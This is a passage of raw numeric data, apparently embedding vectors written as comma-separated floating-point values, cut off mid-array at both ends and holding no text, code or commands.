1288381,0.011984035,0.010780872,0.0031489208,-0.0093194535,0.007392132,-0.008142107,0.0049918024,-0.00016718326,-0.017978711,-0.013924276,-0.01713689,0.00948577,-0.04122106,0.0005329925,-0.016859641,-0.005899878,0.01061806,-0.0056074974,-0.0030391146,-0.0054237535,-0.009111478,0.018001676,-0.0045133256,-0.0016785617,-0.0072087436,-0.007165068,0.0061362106,-0.008959781,0.016871734,0.007497852,0.021945441,0.00825849,0.015345536,-0.012476698,0.018924562,0.010963079,-0.010754401,-0.0041556237,-0.028095702,0.019170137,0.002300696,-0.0050897407,0.02836854,0.008869346,-0.0032469523,-0.000033414177,-0.02855713,-0.009862838,0.0370489,0.009518154,-0.0046965284,-0.0052397265,0.03380703,0.01769428,0.002415961,0.020128943,0.0035326867,-0.047772937,0.015022255,0.012357866,-0.017569335,-0.0011908037,0.011079493,-0.00013344028,0.005032119,0.031050289,-0.018920587,0.005388059,0.004007807,-0.006878285,-0.0052920645,-0.011016268,-0.015177927,0.00057240267,0.027326992,0.012196538,0.00055548106,-0.013361076,0.0017249932,-0.005858477,-0.009288906,0.012473122,0.0033238267,0.004163876,-0.012520217,-0.016988074,0.025674224,0.007984722,0.012495306,-0.00281437,-0.005874102,-0.00571095,-0.005224291,0.0015195534,-0.0053544515,-0.00973799,-0.000088285415,-0.00803065,-0.005060555,-0.019380696,0.03742612,-0.009570394,-0.012109314,0.003069627,-0.01591081,-0.013706424,-0.025529994,0.03639291,-0.011172567,-0.0069846646,0.020677295,0.019813221,0.016427552,-0.011767863,-0.0030516398,0.0061471253,0.0038011456,-0.005121629,-0.0196769,-0.0012112943,0.036362916,-0.026546033,-0.01848118,0.001338846,-0.0067061647,0.02279924,0.011747536,-0.0137827145,-0.0039019573,-0.03275823,-0.0006044345,-0.016335972,0.033439487,-0.0045127054,-0.0073504006,-0.0017716952,-0.006834122,0.022020474,-0.003174822,-0.027560038,0.013602838,-0.024421029,0.019568438,0.009394196,0.028116304,-0.014525854,-0.029246967,0.009140688,-0.021120274,-0.028660247,0.01639345,0.023553506,0.025960006,0.003977493,0.007100262,-0.003866752,0.0064729936,0.015487479,-0.01281361,-0.015714774,0.043040883,-0.005053988,0.00064726407,-0.009197697,-0.026755583,0.006602243,0.009085626,0.017372489,-0.010800588,-0.0013174814,0.004739797,-0.0006683185,-0.0064098733,-0.00973257,0.010521467,0.04245167,0.0015976367,-0.0039257067,-0.0043690503,0.0042707296,0.0005843361,-0.01806759,-0.005174557,-0.002497121,-0.009995961,-0.035175055,0.027492845,-0.0068835323,-0.0019996092,-0.006800645,-0.016794328,0.01423062,0.0019350039,0.009534819,0.008216269,0.0008252636,0.007643011,-0.012306605,-0.018858673,-0.011613264,0.007891077,-0.018619072,0.0009298232,-0.016227039,0.012640381,-0.0022289534,0.01623209,0.012546637,-0.009654122,-0.009825554,-0.0058411486,0.0010562917,0.015177111,0.0026941511,-0.020711726,-0.0052388622,-0.0015715711,-0.009361129,-0.010189693,0.0023297584,-0.0073307003,-0.026277395,-0.01623154,-0.013741354,0.019839088,-0.014446389,-0.019592846,0.00059800147,0.016380146,0.0019741103,0.021649253,0.011700016,-0.018207757,0.027572377,0.0018380175,-0.014838637,0.011280102,-0.015416048,0.007906413,-0.007992014,-0.0041304086,0.0322803,-0.0065888534,0.0048744325,-0.012493929,-0.013711948,-0.039629363,-0.004383439,0.025162324,0.004868263,0.01851926,-0.0073226015,-0.0016300206,-0.013052557,0.016235333,-0.020824477,0.005242163,-0.024010826,0.02404687,-0.0037254377,-0.0114572495,-0.011652072,-0.017484788,0.034812298,-0.014556593,-0.0045223017,-0.0010327767,-0.0026034135,-0.0075443527,-0.0076373843,0.0096234195,-0.021573475,0.016914926,-0.011487917,0.024352454,0.02083916,-0.005310941,0.016450288,-0.0013079206,0.018572398,-0.017187832,0.005337889,-0.010133102,-0.0053698765,-0.00234878,0.014860419,0.01779133,0.019784356,-0.021307493,0.02830386,0.02043208,-0.023351572,0.02080209,0.0072566634,0.0051971,0.0054768748,-0.026363587,0.0029427032,0.0209502,0.014892767,-0.001957757,-0.007838815,0.036346324,-0.0003715528,-0.009683445,0.0037355402,0.017900685,0.0036212548,-0.0093536815,-0.0063623567,-0.019279275,-0.005620473,0.008265889,0.0065824324,-0.0122258,-0.007746215,-0.008355815,-0.0016946025,-0.014875198,-0.0041756695,0.0051592807,0.0016676477,0.0027867781,0.027019292,0.011726899,-0.0031229374,-0.016775744,-0.01299479,0.0077036005,0.004029821,0.0055526597,-0.014698641,-0.0068817227,-0.029403636,-0.004793952,0.02160972,0.008429233,0.0071150092,-0.0033239527,0.018891677,-0.00034179818,0.0063468986,0.00058069424,-0.015679808,-0.032495636,0.0405312,-0.0170174,-0.003757496,-0.0056288964,0.01804453,0.014946652,0.005621789,0.0012983606,0.017182283,-0.019317241,0.0027079734,-0.008302816,0.04442399,-0.014974794,0.010033305,-0.019255707,-0.006719358,-0.013553186,0.008979441,-0.008528301,0.021990228,-0.011982625,-0.022747273,-0.025305005,0.0117776785,-0.04052889,0.008076916,-0.012116779,0.011142129,0.002199121,-0.011410124,0.0018489705,0.014777767,0.007237409,0.012303629,0.017964864,-0.027041351,0.021045472,0.011991861,0.031729978,0.0010030877,-0.0064747473,-0.007029845,-0.0003816278,0.0039922167,0.0021263203,0.002764939,0.0070127486,0.0020751958,-0.0028587512,-0.01795408,0.0146700535,0.014346937,-0.001524237,0.061459985,-0.005868377,0.006849164,0.0011627207,-0.0056978134,0.03220587,0.0109668365,-0.018645711,0.03585636,0.025559535,0.00060927775,0.006130994,-0.012936187,0.019785222,0.010579148,0.026756506,0.0126959495,0.007983533,0.020426411,0.011266725,-0.0049701505,-0.007057828,-0.011007381,-0.00642921,0.00494731,-0.017030232,0.01794524,-0.020567527,-0.008917796,-0.02276475,-0.010737221,-0.026868893,-0.004384981,-0.004852403,0.031128721,-0.01963441,0.021489235,0.008848564,-0.012029486,-0.04180045,0.018527364,0.009820995,0.011262524,0.0011167565,0.015980855,-0.025875436,0.084688745,0.018023586,0.021608908,-0.008878391,0.0020805858,0.011008638,-0.0060394686,0.012804133,0.00060359493,-0.0049212934,0.01544898,0.013431006,-0.02891746,0.01220163,0.01227558,0.005323814,-0.0002856505,0.016791908,-0.00044820757,-0.02025242,-0.014275321,0.0028991788,0.005537115,-0.010322027,-0.026719242,0.014365715,-0.0013033126,0.008168317,0.03110877,-0.018880554,-0.009509572,0.0023301938,0.012317761,0.04540164,0.025401482,-0.054438163,0.003616732,0.17931624,0.0028592497,0.009872903,0.029749162,0.00035324614,-0.015683971,-0.10859439,0.0063872407,-0.023751637,0.011013637,-0.013217368,-0.024210468,-0.017695362,0.04124744,0.013537309,0.018639993,-0.006652435,-0.020742757,0.020225924,-0.008250185,-0.0066784625,0.006092587,-0.00050327997,0.0075869644,-0.023171486,0.006937115,0.019322028,-0.016293334,-0.022366548,0.014737218,0.0058787344,-0.011826033,-0.00080949086,0.00081300107,-0.012383689,0.010152291,0.0054180385,-0.0048607755,-0.004887758,-0.020133067,0.005969912,0.01998993,-0.010269794,-0.03206114,-0.16461506,0.006046394,0.011636327,-0.027351173,0.009324333,0.021532692,0.0090421075,0.019858172,0.003649436,-0.016392764,0.0051757116,0.0053682067,-0.00025912607,0.017929094,0.0059326426,0.002320563,-0.0059159915,-0.025027245,0.000017401662,0.015537928,0.030412644,-0.0045816842,-0.026971966,-0.03805232,-0.0225112,-0.008420241,-0.006958631,0.013537208,-0.025217379,0.020321637,-0.023700224,0.020898873,-0.0090514505,0.018593663,-0.027865158,-0.017807482,-0.017265128,0.01690473,-0.021158395,-0.001915689,0.0029859394,-0.0052491315,0.0076328763,-0.01074823,-0.008076601,0.0156961,0.02032235,-0.013787499,0.011655208,0.017368717,0.024465006,0.017722776,-0.016757939,0.006906857,-0.009124575,-0.006479329,0.001973441,-0.01340361,0.0028947091,0.0008851651,-0.0042079664,-0.020199401,-0.012489688,-0.0231309,0.0016336988,-0.016520215,0.008197211,-0.037246708,-0.0030569748,0.0072897454,0.0030656564,0.006742899,0.017316293,-0.0055227047,0.023953268,0.025460538,-0.009196871,0.015984112,-0.002630491,-0.0030289746,0.0052471454,-0.04021984,0.010216944,-0.009043285,-0.006776117,-0.0053611877,-0.008453861,-0.002947808,-0.013210275,0.011326292,0.0027378234,0.0050831693,0.01820547,0.022095716,0.011253174,0.0044003488,0.020278405,-0.009447726,-0.022389159,0.0054719946,0.009089489,-0.031288695,-0.011222891,0.010779018,0.0012975893,0.017173199,-0.0030652222,-0.020652803,-0.0152592575,-0.00314033,-0.02901153,-0.011813798,0.008984114,-0.021285178,-0.0225528,-0.050270114,-0.0023834868,0.0128290085,0.016573017,-0.019975591,-0.0076346067,-0.009804382,-0.024757845,-0.008594132,0.034203567,-0.002533534,-0.01216337,0.0038012415,-0.014249975,-0.02014149,-0.030653754,0.00042678276,0.002985943,-0.0011300291,-0.0036366575,0.0039888946,-0.013209684,-0.011743477,-0.032171145,-0.002818155,0.033934727,-0.008388116,0.013725213,-0.012132648,0.021374006,-0.00599613,0.028286794,-0.017208107,0.010408348,-0.014060414,-0.0097683715,0.020744642,0.000014302064,-0.008889394,0.028474284,0.08520558,-0.015322161,-0.024688624,0.0052487543,-0.008188455,0.013748693,0.033341717,-0.0109323235,-0.0029654247,-0.008893366,-0.057562537,-0.004067512,-0.002636414,0.008845025,-0.018604625,0.024590624,0.01698044,0.011816918,0.0028633093,-0.0028541668,0.014778668,0.0018081766,-0.010208792,0.03042274,0.029938787,-0.008477236,0.0014891574,-0.014277104,-0.0016571654,0.003376255,0.003579929,-0.0058807624,0.017044323,-0.0286658,0.01595103,-0.060107235,0.0043170056,0.009564935,0.013225876,-0.007220704,0.0130098825,0.008121297,0.00010792655,-0.021693805,0.00238022,0.014792514,-0.01366848,0.015495301,0.0022261478,-0.0077757337,-0.0034330545,0.018086622,-0.0036561473,-0.004477367,-0.0012841459,-0.0070006885,0.011325211,0.01472646,-0.014003422,0.009877287,0.022320012,-0.008973952,0.014229465,-0.0066200728,-0.012142581,0.0073265377,0.015271427,0.003499336,-0.006954006,0.026764547,-0.009392685,0.013556017,0.0030671996,0.018264554,-0.011242024,-0.019618697,-0.01714455,-0.0000133515,-0.013020051,0.0045276363,-0.0041914135,0.0096313115,-0.02018248,0.008411357,0.0028361615,-0.06730015,0.0059212726,0.0011689952,-0.03211647,0.026394708,0.0041580168,0.010866407,0.05343606,-0.009182193,0.020517102,-0.008855261,-0.0023782651,0.0029214325,0.002990468,-0.005424699,0.0034339342,0.0071354876,-0.01061115,-0.014571497,-0.008699308,-0.008182231,-0.016701853,-0.025289813,0.014895579,-0.02438743,0.0040630843,-0.02348381,0.017790236,-0.021115454,0.009199825,0.02202373,-0.014993092,-0.005204245,0.017343642,-0.022192422,0.0028140757,-0.014477158,0.0018323464,-0.01824747,0.004405883,0.010377375,-0.02568358,0.02048468,-0.018136995,0.029797833,0.003112678,0.02627279,-0.01976005,0.03182282,-0.020668093,-0.01517489,0.011731866,-0.0060706506,-0.0072018504,0.019941414,-0.01308225,0.0068363077,-0.008892824,0.000786067,0.012839461,0.008945614,0.008403813,0.0026088739,-0.02218052,0.0048545133,-0.009413856,0.010902016,-0.0007450214,-0.007598432,0.004393721,0.023160566,-0.027390556,0.0036005632,-0.01241576,-0.0082210945,-0.013537422,0.034530804,0.026558483,-0.008835931,-0.020049235,0.0051209,0.009139876,-0.033221755,0.01006036,0.0007466675,-0.005382106,-0.02785179,0.012875212,0.026432782,0.013595014,0.00066070276,0.024999505,-0.016736846,-0.02421054,0.019146536,0.026766656,0.013036662,-0.013823237,-0.003677037,0.014621579,-0.0062326873,-0.0067622936,0.043172568,-0.004985543,-0.021064268,0.012427681,-0.00588217,0.0067506507,-0.011889694,-0.013827965,0.004872929,0.0023268273,-0.029354522,0.007692784,0.014024597,-0.0062799356,0.035424504,-0.01431422,-0.033245504,0.0054561696,0.010509474,-0.021238789,0.003443981,-0.013994824,0.005415346,-0.017544687,0.0069134617,-0.024060113,-0.02915581,-0.0068190615,-0.005575299,-0.0021533584,0.005504484,-0.008658371,-0.0036632486,-0.0049720714,-0.007663602,0.007991345,-0.007731809,-0.027562985,-0.004297117,-0.020591045,0.081103735,-0.0051782075,-0.0018509891,0.019599741,0.02996975,0.023775559,-0.009953055,-0.011070864,-0.039194416,-0.008401416,-0.015491649,-0.037732575,-0.0033378003,0.012166486,-0.021182394,-0.011784478,0.010478901,0.012130393,0.0052539227,-0.0014529276,0.007443399,0.009281829,-0.0023829981,0.0019670688,-0.018799633,-0.016569193,0.008884462,-0.008663648,-0.02046077,-0.0026398555,-0.005146992,-0.00014121846,-0.010644216,-0.022500733,-0.014245894,-0.0020549907,0.011690456,-0.0010640987,0.000961305,0.009198959,0.0243697,-0.0066720904,0.00980808,-0.022494562,0.003768732,-0.008182035,0.010141745,-0.009362278,-0.01743188,-0.01619929,0.007287389,0.025145087,0.010332055,-0.015621165,0.006314064,0.008351257,0.0072761704,-0.005366456,0.029432205,0.01415069,-0.017172243,-0.012786701,-0.008705395,-0.00029038158,0.017564517,0.0144840125,-0.009575064,-0.018653046,0.0033506406,0.015107101,-0.032123044,0.027612153,-0.00031285745,0.0025912148,-0.0064449594,-0.023092283,0.002694278,-0.017430386,0.03000823,0.017050652,0.0016847377,0.0054914155,-0.016402302,0.000925802,-0.020375144,0.0015846429,-0.012362568,-0.0071601295,-0.023857826,-0.009665502,0.02481543,-0.0057416577,-0.0155051425,0.006633786,-0.035048798,-0.010818586,0.0028816531,0.0057745483,-0.0023759936,-0.01526952,-0.008600483,-0.006938024,-0.0032799812,-0.002428317,0.005332063,-0.0066489712,-0.12223167,0.008655523,0.0029520977,0.009488928,-0.014013021,-0.0038385296,-0.0010304061,0.0640609,0.006851916,-0.03080413,-0.01853498,0.02340023,0.023600204,-0.011272977,0.01113945,0.009080575,-0.0017194286,-0.028820775,-0.0009102054,0.007112891,0.010768093,-0.010602702,-0.01107408,-0.012869086,-0.012239617,0.03259479,-0.008064639,0.008918322,0.018756002,0.02638087,-0.0037907436,0.0043634856,0.006866167,-0.0054257493,0.015489898,-0.00049715885,-0.011491726,-0.006916677,0.0035571454,0.003305095,-0.0017111028,-0.024759501,-0.020035412,0.025680525,0.0051787905,0.0097240135,0.0057569877,0.010931297,0.010821092,-0.0005731397,0.00008945867,-0.009130958,0.011709138,0.0030647707,0.0027943496,-0.013564884,-0.021354012,0.005274877,0.015114157,-0.0038992492,0.012398208,0.0053048977,-0.0036606025,-0.02672224,0.00016197597,-0.0027085221,0.011796883,-0.008721489,-0.012560396,-0.009764842,-0.0049352236,0.0067859665,-0.008906229,-0.0065523754,-0.0023651156,0.0007915986,0.018130539,0.020454587,0.011290179,0.016666206,-0.0063512037,-0.008041488,-0.0036816725,0.00851757,-0.015205334,0.012496049,0.019444618,0.0043387986,-0.01747721,-0.020198876,-0.004879463,-0.0022105,-0.014874486,-0.011243817,-0.025344523,0.007712997,0.012410485,0.021244159,0.029137108,-0.012834915,0.010464244,-0.0021991439,-0.009150766,-0.016768618,-0.14087099,0.00032642522,0.032215957,0.008544758,-0.0057430305,-0.014028529,-0.011272636,-0.007854116,0.02415783,-0.0071227513,-0.011501019,0.021600982,0.0051383823,0.005462817,0.013556835,0.010589319,-0.022707777,-0.00039787366,0.00592102,-0.022873957,0.016185896,-0.008790619,-0.030192861,0.011713236,0.010785662,-0.013986538,-0.0037061293,0.012603471,0.012225226,-0.02228498,0.0019642161,-0.0024844133,-0.013397343,0.015678719,-0.04775315,-0.020839177,0.007546118,-0.026069425,0.013417032,-0.012639033,0.022936955,-0.016285319,-0.0021808413,0.0074690646,0.0017140483,0.016144788,0.0126002,0.013240269,0.0069384873,-0.014324732,-0.013086887,0.0055023306,-0.022969158,0.0041861073,-0.028119039,-0.017811716,-0.003244801,0.00017297067,-0.021443823,0.058316324,-0.014919403,-0.009731227,-0.0067667887,0.002842147,-0.018599402,0.022671005,-0.000031932977,0.00960123,0.016743591,0.0155655565,-0.009556625,0.0041684867,0.024785731,-0.00029475903,0.0178742,0.03793557,-0.022378726,0.0280337,0.03152778,-0.005318744,-0.015560179,-0.014802687,-0.016298022,0.028137207,-0.01700253,-0.0003171819,-0.017051876,0.021299288,-0.005994549,0.02597571,-0.008773504,0.014065795,-0.011230541,-0.0013325303,0.01903104,0.025989061,0.02967248,-0.004027874,-0.000008209331,-0.01590182,-0.03499915,-0.019507954,-0.014750322,0.0016171687,-0.008682925,-0.0056672776,0.013238351,-0.010060677,0.0028325578,0.015521004,0.020234998,0.031800967,-0.042335436,-0.00044932426,-0.01640798,-0.006600357,-0.0018119757,0.005276211,0.0033542335,0.018982582,-0.0046769953,0.015869757,-0.0023663067,-0.0131867,-0.0002800364,0.0055077774,0.000084828316,0.01851781,0.021445129,-0.008439069,0.0008766059,-0.011224313,0.02106879,-0.027656738,-0.010932113,0.004728423,-0.0022955087,-0.008711085,-0.0024776636,0.004887467,0.01231109,0.007770765,0.02342526,0.016708361,-0.006731459,-0.009041318,-0.013122346,0.013233333,-0.018513985,0.012200842,-0.014919589,-0.0056513026,0.011351655,-0.011034052,0.0026075658,0.010644845,-0.021162758,0.009648175,0.012279757,-0.0060114656,0.0008384652,0.0031006145,0.0084452545,-0.012115429,-0.00068581535,0.0022919856,-0.00031418802,-0.0063259965,-0.0023700488,-0.0051819505,0.02657881,-0.010566054,-0.014358694,-0.008720443,0.032392032,0.01691853,0.04429544,0.02651185,0.017539915,0.024327626,0.014676008,0.009032886,-0.030527655,-0.007434714,-0.006689003,0.0056897993,0.001998072,0.0054291617,-0.0025188904,-0.004284213,0.013125046,-0.014661464,-0.007785975,-0.016074644,0.009466199,-0.0017149294,-0.000914671,-0.009839912,0.0099863345,-0.005127013,-0.009358277,0.017478896,-0.0010362095,-0.013849469,-0.00441397,0.0020387277,0.00083800504,0.045745846,0.047136154,-0.0028743632,-0.018423375,-0.0027575402,-0.015461756,0.023645569,0.020429965,0.010486986,-0.024859905,-0.03507627,0.028990297,-0.0007779301,0.00015781708,-0.010605468,0.017025813,-0.010189662,0.0050818045,0.018879268,0.004111327,0.011809,0.004672464,-0.019195702,0.0013920749,0.010897726,-0.010562258,0.01987567,-0.00037775267,-0.015519812,0.037009623,-0.026020117,-0.0016514859,0.00020145356,0.016272072,0.031745214,0.015143467,0.01944943,-0.008443322,-0.024057515,0.0037763596,0.00073316763,-0.008728341,0.00761305,0.01470455,-0.011647974,-0.0075404304,-0.0007175046,-0.010648702,0.0038796288,0.032724626,0.006960449,-0.021169249,0.0073811947,-0.017694343,0.0132687455,-0.0037805883,0.019864824,-0.0056884806,-0.021730214,0.0033024398,-0.03239435,-0.009163689,-0.0034121214,-0.0039543407,0.011849629,-0.0017574485,0.024628835,-0.0015288909,-0.005278945,0.0018713074,-0.002340173,-0.0068872,-0.00029567722,-0.006930263,0.008218934,-0.018716978,-0.014505219,0.0045334836,-0.003961756,-0.00558098,-0.009360936,-0.01599271,-0.0069526257,0.008293085,-0.0061569363,0.008229964,-0.031197153,-0.03057125,0.018182274,0.026868304,-0.01820651,-0.011183371,-0.0011611583,0.0021607708,-0.006871123,-0.015993295,0.009042712,0.0060591516,0.00034348638,-0.0019173054,0.006588069,-0.0039359997,0.004424118,0.0047896053,0.019899044,-0.0022346799,0.012132784,0.011522437,0.01631217,-0.0051467437,0.0032875359,-0.0278723,-0.007857181,-0.015022338,-0.021950202,0.039001297,-0.01802502,0.02506104,-0.008954012,0.014116494,0.0046568,-0.0061362246,0.02624908,0.025732381,0.008775582,-0.0026536274,-0.019990956,0.018056652,-0.005987405,0.0026376364,0.02177116,0.010726128,0.019583672,0.023750816,-0.004006607,0.00282574,-0.018511392,-0.009924674,0.007166462,-0.00450486,-0.008397971,0.021931434,0.0031958825,-0.00022272125,0.004131431,0.017924622,-0.0040329834,0.00047398737,0.01724826,-0.037986834,-0.01614284,-0.00014596981,-0.0060301055,-0.009951275,0.020308895,-0.005277769,-0.00057604717,-0.012348284,-0.011625149,-0.013833285,0.028234774,-0.032219917,-0.0077478406,-0.014071395,-0.0024567377,-0.01869853,-0.011096635,-0.025712198,-0.076784514,0.012860638,0.0056265076,-0.018057298,0.025004301,0.0036603406,-0.013375516,-0.02164221,-0.004574522,-0.00435247,-0.0032978153,-0.0108753545,0.009081103,0.023245724,0.013081584,-0.01203197,-0.012156758,0.011887259,0.0041496423,0.0042062667,-0.004837369,0.029375117,0.01467203,-0.0013433686,0.018374795,-0.013341706,-0.014931476,-0.0043420093,-0.019344913,0.004746762,0.0028531784,-0.0041070636,-0.012073486,0.004285196,-0.010793784,0.01909342,0.009334964,0.0027815439,-0.017249314,-0.011606263,-0.006276857,0.01817112,0.0043953247,0.0072334353,-0.00891146,0.023990693,-0.0137910675,-0.021575931,-0.01956172,0.0018121838,0.023345174,-0.0146083515,-0.011812433,0.020227829,0.013801231,0.004087843,-0.005822265,-0.003831386,0.04110621,0.00059062097,-0.019224355,-0.002669538,0.016322149,-0.012222216,-0.008090326,0.022881743,-0.009061599,0.02772898,-0.018970292,0.032898456,0.014201959,-0.021124005,-0.026266402,-0.0052419147,-0.020919455,0.015598571,0.012719077,-0.008708804,-0.008507992,0.011539995,0.041119955,0.007618638,-0.014212871,0.0011348092,0.0023413678,0.015248125,-0.010610889,0.0059377886,0.03680891,-0.0043246495,0.0068048383,0.002229631,0.0032247338,-0.01605574,-0.0032138855,0.028292913,0.007335714,0.0013172831,0.04052324,0.0032496725,-0.028694859,0.004221862,0.006457906,-0.0027894431,0.0038954427,0.0054418035,0.007289021,0.0058844485,0.0046734964,0.00434438,-0.0053753676,0.03231158,0.010966961,0.030785466,0.023006963,0.019699907,-0.013668345,0.019764077,0.0028693553,0.01450569,-0.017128475,-0.0049355025,-0.0059057563,0.011845787,0.004000793,-0.0015075391,-0.005726529,-0.00026119317,-0.0131696025,0.016416539,-0.032509636,0.030167643,0.019406537,0.01716263,0.002118413,0.0032368337,-0.017982595,0.0005127195,-0.013971505,0.0010360933,-0.0029192322,-0.018287245,0.00533652,0.000005833075,-0.00076877174,0.030045623,-0.0028365802,0.0008721066,-0.030042237,-0.006077024,-0.010094406,0.0027678302,0.013657039,0.0033331153,-0.009411219,-0.01254816,0.024878027,0.016027458,0.0009630204,-0.016235003,0.0012206263,0.0035635815,0.020544805,0.0134776095,-0.005569401,0.010022866,-0.0035725173,0.0037206307,-0.0034618266,-0.014836568,-0.03107223,-0.012874647,0.005738631,-0.014213756,-0.004472799,0.004259255,0.026125172,0.027243672,-0.023171693,-0.00843885,0.00030960285,0.0003012282,-0.002229624,0.0065465774,-0.00487677,-0.00073925673,-0.011674241,0.00031913025,-0.0012962468,-0.025673877,-0.003303455,-0.0028206916,0.0022616496,0.021489307,-0.03465947,-0.005148133,-0.0038948357,0.013439293,-0.015047065,-0.0041471682,-0.007638086,0.004901089,-0.0020412605,0.026208363,0.012921064,0.010712306,0.022079024,-0.005303168,-0.0071760574,0.013597427,0.0028077369,0.021280382,-0.021134378,0.09532654,0.027390955,-0.011981115,0.0017921068,-0.0041903155,0.015218853,0.021870885,0.013753998,0.010304765,0.015788969,-0.0038918315,-0.011367959,0.02010158,-0.012907224,-0.012874865,0.038321,0.012703773,0.009181425,0.0004967578,-0.024590353,0.009044351,-0.05519473,-0.033289216,-0.00749,-0.001715999,-0.057286978,0.016741935,0.028730175,0.0064770854,0.029346801,0.016276352,0.018945616,0.039724343,-0.008020785,-0.007740091,-0.015743444,0.009334998,-0.02681335,0.014939335,0.002606845,-0.008628704,0.014396321,-0.008980198,-0.019180669,-0.019484438,0.005105278,-0.00028393877,-0.01053674,-0.0016466168,0.0030858961,0.00985457,0.0154578015,0.015594023,-0.0029453395,0.02574626,0.018295243,-0.008307295,0.014032566,0.0053960206,-0.012179194,0.037113357,-0.0036238602,0.010725521,-0.0037909814,0.0110328635,0.014230834,-0.041001055,-0.010837367,-0.023086876,-0.014431031,0.02133024,-0.009852613,0.019170266,0.037792444,-0.022141466,0.0057742423,-0.0018971342,-0.006536139,-0.0034628466,-0.01519976,0.011789227,0.0022178248,-0.007370628,-0.011326933,0.015418335,-0.006393824,-0.0040312223,0.019772882,-0.013531652,0.0018565295,0.013942,0.008594781,0.0040127155,0.00068572414,-0.020042647,-0.007913654,0.014815266,-0.019167017,0.007317586,0.02437483,0.014567945,-0.006005049,0.010988816,-0.000606922,-0.036531806,-0.00989929,-0.006542182,0.03921516,-0.005741405,0.00400446,0.017122285,0.009299132,0.0027273772,0.008211848,-0.0031578776,-0.023925098,-0.017452018,-0.02836749,0.01507283,-0.016161684,-0.0070348443,0.009644472,-0.0060996357,0.01690922,0.00501351,0.023711847,0.0055651823,0.0009394371,-0.0057302252,-0.014150801,0.0058000814,-0.049460247,0.003257113,0.017382117,-0.020156238,0.016200125,0.021683767,0.020727647,-0.005481262,-0.0058468417,0.011421712,0.0021810087,-0.013817269,0.008571831,-0.03260433,-0.027159406,0.007866543,-0.00015431146,0.00074265397,0.0046283104,-0.0058946507,0.010251791,-0.000490847,-0.006956118,-0.024674589,-0.017082548,0.012825373,-0.0065832664,-0.011015901,0.015803235,0.020273147,0.005033293,-0.0063532954,-0.038710464,0.012662768,0.017873198,-0.009589647,-0.011220459,0.0072631524,0.012278226,0.00084022566,-0.011390045,0.0020903999,0.016326163,0.01795859,-0.015060904,0.005580764,0.016739922,-0.004301268,0.011141033,-0.0042013763,0.0018658161,-0.013977107,0.034459695,-0.0052046143,-0.0069290744,0.005225571,0.007194567,-0.014157952,0.02668388,-0.02021645,0.023403574,-0.0031544953,0.007916795,-0.013356627,0.0058676037,-0.013802572,0.03774331,-0.029916208,-0.0248173,-0.010644744,-0.009096793,0.0013242408,-0.021915901,0.014617348,-0.017628651,-0.0008224085,-0.024965018,-0.008980294,0.004135724,-0.009880749,0.0060919086,-0.0056040245,0.0035945424,-0.0019133934,0.0038114686,-0.03151913,0.0017874674,-0.039178777,0.0055236327,0.004266589,-0.025450423,-0.0015309646,0.010523096,0.011297144,-0.026045484,-0.003936202,0.0073213098,0.010286679,-0.03514067,-0.015466986,0.0012531972,-0.016236432,-0.0019446576,0.027802896,-0.02180571,0.0072166966,0.009708142,0.008603029,-0.0061391853,-0.03158683,-0.008175626,-0.009533472,-0.006903825,-0.03365144,-0.003554707,0.025214063,-0.034391917,-0.027135983,-0.028451845,-0.014909076,0.022533482,-0.04242333,-0.01671474,-0.016469032,-0.011698637,-0.0064047882,0.019065205,0.002734675,0.0013316721,0.017722424,-0.03184349,0.021247413,-0.00049489515,0.0069839233,-0.008136877,0.0052095354,-0.0013423457,0.008420423,-0.0048450376,-0.009263466,0.002723413,-0.019609883,-0.018936915,-0.032020215,-0.0034561148,-0.0010390952,0.01695475,-0.015921835,0.026368905,-0.01160299,-0.020967195,0.00865987,-0.009425212,-0.0020339028,-0.01594166,0.016397003,0.021174407,0.023022039,-0.04869197,-0.008300211,0.017914074,-0.03107988,-0.01802968,-0.00201953,-0.008559658,-0.032534108,-0.03862135,0.01635133,-0.01727506,-0.0064634196,-0.037215225,0.0022921823,0.011667678,0.010120012,0.004127318,0.003050125,0.004716168,-0.0023941228,0.033827577,0.0028134598,0.0053233784,0.0050895223,-0.015411462,-0.024898559,-0.03931569,-0.0034416164,0.0057298695,-0.0074296608,0.009717135,0.024594126,-0.007304105,0.0024096319,-0.02775735,0.0046606245,-0.010989104,0.01921602,-0.026638929,-0.024317075,-0.013124428,0.018372947,-0.009155427,0.025843171,0.0044721584,0.0044947625,0.010466617,-0.013982529,0.11723276,-0.011552389,0.0067721275,-0.0011218223,0.017327517,-0.006277866,-0.0053517916,0.009456996,-0.024162838,0.015754156,-0.012123593,-0.008643941,0.003145825,0.0007520962,0.01675453,-0.01669593,0.00846901,0.15033336,0.015578877,0.0023230587,0.03602077,0.006629415,0.026122827,0.0051658284,0.025924886,-0.07447766,0.02008148,-0.026467387,0.014250116,-0.015004849,-0.006107051,0.006604733,-0.0020495818,-0.017922107,-0.008522203,0.016073124,-0.029649843,-0.021864146,-0.027681002,-0.004813611,0.004238468,-0.014718237,0.011843048,0.0167751,0.0077465614,0.0030053053,-0.025344947,-0.017174423,-0.001372355,0.026460707,0.023536641,-0.007487929,0.005726879,0.0069671916,0.010009794,0.0055944533,0.0064534615,0.010741701,-0.037560783,0.018575335,-0.0006501324,0.0018923496,-0.016180763,0.018762188,-0.024817439,0.0017287097,-0.013813587,-0.017539913,-0.0040476033,0.006353035,-0.0010145991,-0.004285763,-0.0031621996,-0.0024051545,0.0010189358,0.0106323315,-0.023075666,0.0042123543,0.02066139,-0.030145805,0.00744139,0.011763429,-0.018286614,0.002717974,0.0011385293,0.01970661,0.0034175138,0.006522093,-0.0052532004,-0.001695475,-0.0019575325,0.01413291,0.0035672747,-0.0056999614,-0.0120195905,0.006659533,0.006364416,0.0004348084,-0.0071544005,-0.0138294855,-0.0059963516,0.0042381645,0.017123468,0.009363461,-0.0085788835,0.021502212,-0.0019136248,-0.003635642,-0.02085208,0.0075725587,0.0070182965,0.0007875176,-0.017772889,0.010880206,-0.010765256,-0.020234076,0.010783862,0.022227028,-0.017784685,0.015449531,0.004068091,-0.017822912,0.01767102,0.008742005,-0.016603636,-0.0029205515,0.024452709,-0.014657993,-0.03238961,0.009978276,-0.00824081,-0.008532117,0.047116604,0.032135405,0.038856417,0.0028803144,0.0024487101,-0.038017817,-0.01924505,-0.0064429613,0.012114446,0.013078512,0.0024189204,0.0099385455,-0.005461374,0.008229818,-0.010196314,-0.029921826],[0.020950112,-0.008420031,0.0065114587,-0.02469649,0.006674822,-0.013845452,-0.028353974,-0.0008578457,0.024612607,-0.0031364404,0.0032125562,0.031149693,0.0029928838,0.0035322302,-0.010526795,-0.0018950861,0.00421024,0.0023435268,0.0245